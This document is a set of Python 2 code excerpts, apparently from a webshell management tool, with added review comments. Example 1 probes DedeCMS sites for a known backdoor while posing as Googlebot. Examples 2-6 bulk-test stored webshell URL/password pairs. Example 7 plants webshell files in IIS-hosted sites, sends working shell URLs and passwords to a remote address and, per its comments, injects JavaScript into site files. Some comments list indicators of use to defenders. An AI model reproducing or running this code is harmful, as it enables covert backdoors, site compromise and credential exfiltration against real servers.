Exemple #1
 # Probe host `arg` for the fixed path /plus/dst.php and, when the server
 # answers 200, pass the URL to yijuhua.yijuhua_cs with the hard-coded
 # password "cmd". Judging by the original comments, that helper tests whether
 # a one-line webshell answers at the URL -- confirm against the helper.
 # A positive result is queued as an "exp_dedecms_yijuhua" finding.
 #
 # Returns False when an exception is raised; every other path falls through
 # and returns None.
 #
 # NOTE(review): the request carries a Googlebot User-Agent string. For
 # defenders, a GET for /plus/dst.php with a Googlebot User-Agent from an
 # address that does not verify as Google is a useful log indicator.
 # NOTE(review): `conn` is never closed in the visible code, and the broad
 # `except` hides every failure, including programming errors.
 def find(self, arg):
     site = '/plus/dst.php'
     # Request headers (the name is a misspelling of "headers").
     heareds = {
         "User-Agent":
         "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
     }
     conn = httplib.HTTPConnection(arg)
     try:
         conn.request('GET', site, None, heareds)
         httpres = conn.getresponse()
         if httpres.status == 200:
             data = 'http://%s/plus/dst.php' % arg
             if yijuhua.yijuhua_cs("php", data,
                                   "cmd"):  # args: script type (ASP or PHP), URL, password
                 # check succeeded
                 EXP_list = [
                     self.url, "exp", "exp_dedecms_yijuhua", data, "cmd",
                     "webshell"
                 ]
                 # fields: [site URL, vulnerability type, vulnerability detail,
                 #          vulnerable URL, password, remark]
                 #print EXP_list
                 # NOTE(review): if exp_url is a standard Queue, the second
                 # positional argument of put() is `block`, not `timeout`.
                 Class_Queue.exp_url.put(EXP_list, 0.5)  # enqueue the finding
     except Exception, e:
         #print e
         return False
Exemple #2
    # GUI handler: for every row selected in SQLite_tableView, re-test the
    # stored URL (column 0) / password (column 1) pair with yijuhua.yijuhua_cs
    # and write the outcome ('null', 'ok' or 'No') to both the table view and
    # the `shell` table. Module-level counters yu_2 (successes) and yu_3
    # (failures) are incremented as a side effect.
    #
    # Returns 0 if any row raises; otherwise falls through and returns None.
    #
    # NOTE(review): every SQL statement here is built with % formatting from
    # cell values (URL, password, helper output). A quote character in any of
    # them breaks or alters the statement; bound parameters would avoid that,
    # but mysqlite3_update's signature is not visible here -- confirm.
    # NOTE(review): the button is disabled up front and, in the code visible
    # here, only re-enabled on the exception path.
    # NOTE(review): `except BaseException` also traps KeyboardInterrupt and
    # SystemExit.
    def yjh_cs_2(self):  # test whether the one-line webshell connection succeeds
        global yu_2, yu_3
        self.ui.main_pushButton_2.setEnabled(0)  # disable the button while running
        int_model = self.ui.SQLite_tableView.selectionModel()  # selection model (selected rows)
        model = self.ui.SQLite_tableView.model(
        )  # data model; cells are read as model.data(model.index(row, col)).toString()
        h = qqwry.C_hoset()

        for index in int_model.selectedRows():  # for every selected row
            try:
                int_index = index.row()  # row number
                s0 = model.data(model.index(int_index, 0)).toString()
                s1 = model.data(model.index(int_index, 1)).toString()
                # Current local time as text (shown in the table) ...
                data_time2 = time.strftime('%Y-%m-%d %H:%M:%S',
                                           time.localtime(time.time()))
                # ... and parsed back into an epoch timestamp (stored in the DB).
                data_time = time.mktime(
                    time.strptime(data_time2, '%Y-%m-%d %H:%M:%S'))  # convert to a timestamp
                # URLs that are empty or at most 7 characters long are recorded
                # as 'null' without being tested.
                if s0 == "" or len(s0) <= 7:
                    yu_3 += 1  # failure counter
                    self.tableView_add(int_index, None, None, u"null", None,
                                       None, None, None, None, None,
                                       data_time2)  # update the table row
                    sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                        data_time, str(s0), str(s1))
                    self.sql3.mysqlite3_update(sql_data)
                    continue  # skip to the next row

                if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                    yu_2 += 1  # success counter
                    win_linux = yijuhua.yijuhua_win_linux(
                        str(s0), str(s1))  # args: URL, password; returns the operating system
                    # presumably location/IP information for the host, looked up
                    # through the qqwry helper -- confirm; stored in column ips5
                    WLWZ = h.www_data(qqwry.url_www(str(s0)))
                    WLWZ = u"%s" % (WLWZ)
                    # ASP targets are recorded as "WinNT" regardless of the
                    # helper's answer.
                    if g.bool_asp_php(str(s0)) == "asp":
                        win_linux = "WinNT"
                    self.tableView_add(int_index, None, None, u"ok",
                                       str(win_linux), None, None, None, WLWZ,
                                       None, data_time2)  # update the table row
                    sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                        str(win_linux), WLWZ, data_time, str(s0), str(s1))
                else:
                    yu_3 += 1  # failure counter
                    self.tableView_add(int_index, None, None, u"No", u"No",
                                       None, None, None, None, None,
                                       data_time2)  # update the table row
                    sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                        data_time, str(s0), str(s1))
                # Persist whichever 'ok' / 'No' statement was built above.
                self.sql3.mysqlite3_update(sql_data)

            except BaseException, e:
                print(str(e))
                self.ui.main_pushButton_2.setEnabled(1)
                return 0
Exemple #3
 # Re-test stored URL/password pairs from the `shell` table, chosen by status:
 #   ID == 0 -> rows never tested (zts3 is null)
 #   ID == 1 -> rows previously marked 'ok'
 #   ID == 2 -> rows previously marked 'No'
 # Each row is checked with yijuhua.yijuhua_cs and its status written back.
 # Module-level counters yu_2 (successes) and yu_3 (failures) are incremented.
 #
 # Returns 0 if an exception is raised; otherwise falls through (None).
 #
 # NOTE(review): for any other ID, sql_data stays "" and is still passed to
 # cur.execute().
 # NOTE(review): the UPDATE statements are built with % formatting from
 # database values and helper output; a quote in any of them breaks or alters
 # the statement. Bound parameters would avoid that.
 # NOTE(review): URL and password are printed to stdout in clear text.
 def db_cs(self, ID):  # test one-line webshells that have not been tested yet
     try:
         global yu_1, yu_2, yu_3
         sql_data = ""
         if ID == 0:
             sql_data = "select * from shell where zts3 is null"
         if ID == 1:
             sql_data = "select * from shell where zts3='ok'"
         if ID == 2:
             sql_data = "select * from shell where zts3='No'"
         self.sql3.conn.commit()  # commit pending changes before querying
         cur = self.sql3.conn.cursor()  # obtain a cursor
         cur.execute(sql_data)  # run the SELECT chosen above
         res = cur.fetchall()  # fetch all matching records
         for line in res:
             s0 = str(line[0])
             s1 = str(line[1])
             # Current local time as text, then parsed back to an epoch value.
             data_time2 = time.strftime('%Y-%m-%d %H:%M:%S',
                                        time.localtime(time.time()))
             data_time = time.mktime(
                 time.strptime(data_time2, '%Y-%m-%d %H:%M:%S'))  # convert to a timestamp
             # Empty or very short (<= 7 characters) URLs are marked 'null'
             # without being tested.
             if s0 == "" or len(s0) <= 7:
                 yu_3 += 1  # failure counter
                 sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                     data_time, str(s0), str(s1))
                 self.sql3.mysqlite3_update(sql_data)
                 continue  # skip to the next record
             if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                 yu_2 += 1  # success counter
                 win_linux = yijuhua.yijuhua_win_linux(
                     str(s0), str(s1))  # args: URL, password; returns the operating system
                 # presumably location/IP information for the host -- confirm
                 WLWZ = self.h.www_data(qqwry.url_www(str(s0)))
                 WLWZ = u"%s" % (WLWZ)
                 # ASP targets are always recorded as "WinNT".
                 if g.bool_asp_php(str(s0)) == "asp":
                     win_linux = "WinNT"
                 sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                     str(win_linux), WLWZ, data_time, str(s0), str(s1))
                 self.br_pr_sogo(s0, s1)  # per the original comment: fetch Baidu / Google / Sogou rank
                 print u"URL:%s--passwod:%s-----ok-----%s" % (str(s0),
                                                              str(s1), WLWZ)
                 self.messagebox()
             else:
                 yu_3 += 1  # failure counter
                 sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                     data_time, str(s0), str(s1))
                 self.messagebox()
                 print u"URL:%s--passwod:%s-----No" % (str(s0), str(s1))
             # Persist whichever 'ok' / 'No' statement was built above.
             self.sql3.mysqlite3_update(sql_data)
     except BaseException, e:
         print(str(e))
         return 0
Exemple #4
 # For each "path|password" entry in self.list, append the path to `url` and
 # test the resulting URL with yijuhua.yijuhua_cs; positives are queued as
 # "exp_eval" findings. Entries without a "|" separator are ignored.
 #
 # NOTE(review): the queued record stores self.url, not the `url` argument
 # that was actually scanned -- confirm the two are always the same.
 # NOTE(review): there is no error handling here; an exception from the
 # helper propagates to the caller.
 def scan(self, url):
     self.look_add_file()  # per the original comment: load the entries (populates self.list, presumably)
     for i in self.list:
         ss = i.split("|")
         if len(ss) >= 2:
             url2 = url + ss[0]
             if yijuhua.yijuhua_cs(self.bool_asp_php(url2), url2,
                                   str(ss[1])):  # args: script type (ASP or PHP), URL, password
                 # check succeeded
                 EXP_list = [
                     self.url, "exp", "exp_eval", url2,
                     str(ss[1]), "webshell"
                 ]
                 # fields: [site URL, vulnerability type, vulnerability detail,
                 #          vulnerable URL, password, remark]
                 #print EXP_list
                 # NOTE(review): if exp_url is a standard Queue, the second
                 # positional argument of put() is `block`, not `timeout`.
                 Class_Queue.exp_url.put(EXP_list, 0.5)  # enqueue the finding
Exemple #5
    # GUI handler: for every row selected in tableView, test the stored URL
    # (column 0) / password (column 1) pair with yijuhua.yijuhua_cs and record
    # 'null', 'ok' or 'No' in both the table view and the `url` table. On
    # success the operating system and the value from yijuhua.www_wlwz are
    # stored as well.
    #
    # NOTE(review): SQL is built with % formatting from cell values; only the
    # www_wlwz value is passed through urllib.quote, so a quote character in
    # the URL or password still breaks or alters the statement.
    # NOTE(review): `except BaseException: pass` silently discards every
    # failure for a row, and the button disabled at the top is not re-enabled
    # anywhere in the code visible here.
    def br_pr_sogo_4(self):  # query the webshell status
        self.ui.pb_pushButton_1.setEnabled(0)  # disable the button while running
        int_model = self.ui.tableView.selectionModel()  # selection model (selected rows)
        model = self.ui.tableView.model(
        )  # data model; cells are read as model.data(model.index(row, col)).toString()
        for index in int_model.selectedRows():  # for every selected row
            try:
                int_index = index.row()  # row number
                s0 = model.data(model.index(int_index, 0)).toString()
                s1 = model.data(model.index(int_index, 1)).toString()
                # Empty or very short (<= 7 characters) URLs are marked 'null'
                # without being tested.
                if s0 == "" or len(s0) <= 7:
                    self.tableView_add(int_index, None, None,
                                       u"null")  # update the table row
                    sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % (
                        str(s0), str(s1))
                    self.sql3.mysqlite3_update(sql_data)
                    continue  # skip to the next row
                    #print str(s0)
                if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                    # Default to "WinNT"; only PHP targets are asked for their OS.
                    win_linux = "WinNT"
                    if g.bool_asp_php(s0) == "php":
                        win_linux = yijuhua.yijuhua_win_linux(str(s0), str(s1))

                    www_wlwz = yijuhua.www_wlwz(str(s0))
                    self.tableView_add(int_index, None, None, u"ok",
                                       str(win_linux), None, None,
                                       www_wlwz)  # update the table row
                    sql_data = "update url set zt='ok',win='%s',wl='%s' where url='%s' and passwod='%s'" % (
                        str(win_linux), urllib.quote(
                            str(www_wlwz)), str(s0), str(s1))
                else:
                    self.tableView_add(int_index, None, None,
                                       u"No")  # update the table row
                    sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % (
                        str(s0), str(s1))
                    #print sql_data
                # Persist whichever 'ok' / 'No' statement was built above.
                self.sql3.mysqlite3_update(sql_data)

            except BaseException, e:
                pass
Exemple #6
    # GUI handler: for every row selected in tableView, test the stored URL
    # (column 0) / password (column 1) pair with yijuhua.yijuhua_cs and record
    # 'null', 'ok' or 'No' in both the table view and the `url` table.
    #
    # NOTE(review): SQL is built with % formatting from cell values; a quote
    # character in the URL or password breaks or alters the statement. Bound
    # parameters would avoid that.
    # NOTE(review): `except BaseException: pass` silently discards every
    # failure for a row, and the button disabled at the top is not re-enabled
    # anywhere in the code visible here.
    def br_pr_sogo_4(self):  # query the webshell status
        self.ui.pushButton_4.setEnabled(0)  # disable the button while running
        int_model = self.ui.tableView.selectionModel()  # selection model (selected rows)
        model = self.ui.tableView.model(
        )  # data model; cells are read as model.data(model.index(row, col)).toString()
        for index in int_model.selectedRows():  # for every selected row
            try:
                int_index = index.row()  # row number
                s0 = model.data(model.index(int_index, 0)).toString()
                s1 = model.data(model.index(int_index, 1)).toString()
                # Empty or very short (<= 7 characters) URLs are marked 'null'
                # without being tested.
                if s0 == "" or len(s0) <= 7:
                    self.tableView_add(int_index, None, None,
                                       u"null")  # update the table row
                    sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % (
                        str(s0), str(s1))
                    self.sql3.mysqlite3_update(sql_data)
                    continue  # skip to the next row
                #print str(s0)
                if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                    self.tableView_add(int_index, None, None,
                                       u"ok")  # update the table row
                    sql_data = "update url set zt='ok' where url='%s' and passwod='%s'" % (
                        str(s0), str(s1))
                else:
                    self.tableView_add(int_index, None, None,
                                       u"No")  # update the table row
                    sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % (
                        str(s0), str(s1))
                #print sql_data
                # Persist whichever 'ok' / 'No' statement was built above.
                self.sql3.mysqlite3_update(sql_data)

            except BaseException, e:
                pass
Exemple #7
# Walk the sites found in the text returned by open_file() (an IIS
# configuration file, per the message printed on failure). For each site it
# extracts the ServerBindings and Path attributes, builds a file path under
# the site directory, writes a file there with path_file(), and checks through
# each of the site's URLs whether that file answers as a webshell. Outcomes
# are appended to "webshell--OK.txt" / "webshell--NO.txt"; when argv3 is set,
# a confirmed URL and password are also sent to that address.
#
# Returns 0 when the configuration cannot be read or when any site raises
# (which also stops processing of the remaining sites); otherwise None.
#
# NOTE(review): artifacts visible in this code that defenders can look for:
#   - newly created files with the ASP_PHP extension in directories below a
#     site root, whose names end in the output of sj_az_AZ(8) (presumably 8
#     generated letters -- confirm);
#   - files named "webshell--OK.txt" and "webshell--NO.txt" (their location
#     depends on TXT_file2, not shown);
#   - an outbound request to argv3 with "url=" and "passwod=" query
#     parameters, which carries the password in the URL;
#   - whatever list_file_js() changes under the site directory (per the
#     original comment it walks the path and attaches JavaScript).
# NOTE(review): the dropped file is removed only when no URL validated and
# only if the loop finishes without an exception.
def IIS_xml():
    data = open_file()
    if data == 0:
        print u"Cannot find the file path in the C IIsWebServerfile"  # IIS configuration file not found
        return 0
    p1 = re.compile(r'<IIsWebVirtualDir(.+?)</IIsWebServer>')
    data1 = data.replace("\n", '')  # strip newlines so the pattern can match across lines
    IISWEB = p1.findall(data1)  # one captured block per site
    for every1 in IISWEB:  # for every site block
        try:
            p2 = re.compile(r'ServerBindings="(.+?)"')
            data2 = p2.findall(every1)  # site bindings (host names)
            if len(data2) < 1:
                continue  # skip this site
            p3 = re.compile(r'Path="(.+?)"')
            data3 = p3.findall(every1)  # site directory
            if len(data3) < 1:
                continue  # skip this site
            download_Path = TQ_Path(data3[0])  # site directory
            data_list = list_file(download_Path)  # enumerate entries below it
            if len(data_list) >= 1:
                # Path of the file to create: a randomly chosen entry from
                # data_list, followed by sj_az_AZ(8), ".", and ASP_PHP.
                data_url2 = "%s%s.%s" % (
                    data_list[sjs_random(0, len(data_list))], sj_az_AZ(8),
                    ASP_PHP)
            else:
                continue  # skip this site
            www_bool = False  # set to True once any URL validates
            for www_url in http_www_url(data2[0]):
                print "www:%s" % (www_url)  # site URL
                print "download_Path:%s" % (download_Path)  # site root directory
                print "download_Path eval:%s" % (
                    data_url2
                )  # path of the file on disk
                www_url2 = "%s%s" % (
                    www_url, download_bz(download_Path, data_url2).replace(
                        "\\", '/')
                )  # URL of the file: site URL plus the path from download_bz, with / separators
                print "www_Path:%s" % (www_url2)  # URL of the file
                path_file(data_url2, argv1)  # write the file (args: path, content -- per the original comment)
                if yijuhua.yijuhua_cs(ASP_PHP, str(www_url2), str(argv2)):
                    www_bool = True
                    # NOTE: rebinding `data` is harmless here; data1 was
                    # already derived from it before the loop.
                    data = "%s|%s" % (str(www_url2), str(argv2))
                    TXT_file2("webshell--OK.txt", data)
                    print "file:%s" % (data_url2)
                    print "url:%s password:%s--OK" % (str(www_url2),
                                                      str(argv2))
                    if not argv3 == "":
                        # Values are concatenated into the query string
                        # without URL encoding.
                        data_url = "%s?url=%s&passwod=%s" % (
                            str(argv3), str(www_url2), str(argv2))
                        yijuhua.Aurl_post(data_url)  # submit to the remote back end
                        print "post %s" % (data_url)
                else:
                    data = "%s|%s" % (str(www_url2), str(argv2))
                    TXT_file2("webshell--NO.txt", data)
                    print "file:%s" % (data_url2)
                    print "url:%s password:%s--NO" % (str(www_url2),
                                                      str(argv2))
            print "----------------------------------------"
            list_file_js(download_Path)  # per the original comment: walk the path and attach JS
            if www_bool == False:
                if os.path.isfile(data_url2):  # does the file exist?
                    os.remove(data_url2)  # delete the file
                    print "delete %s" % (data_url2)
        except BaseException, e:
            #print(str(e))
            return 0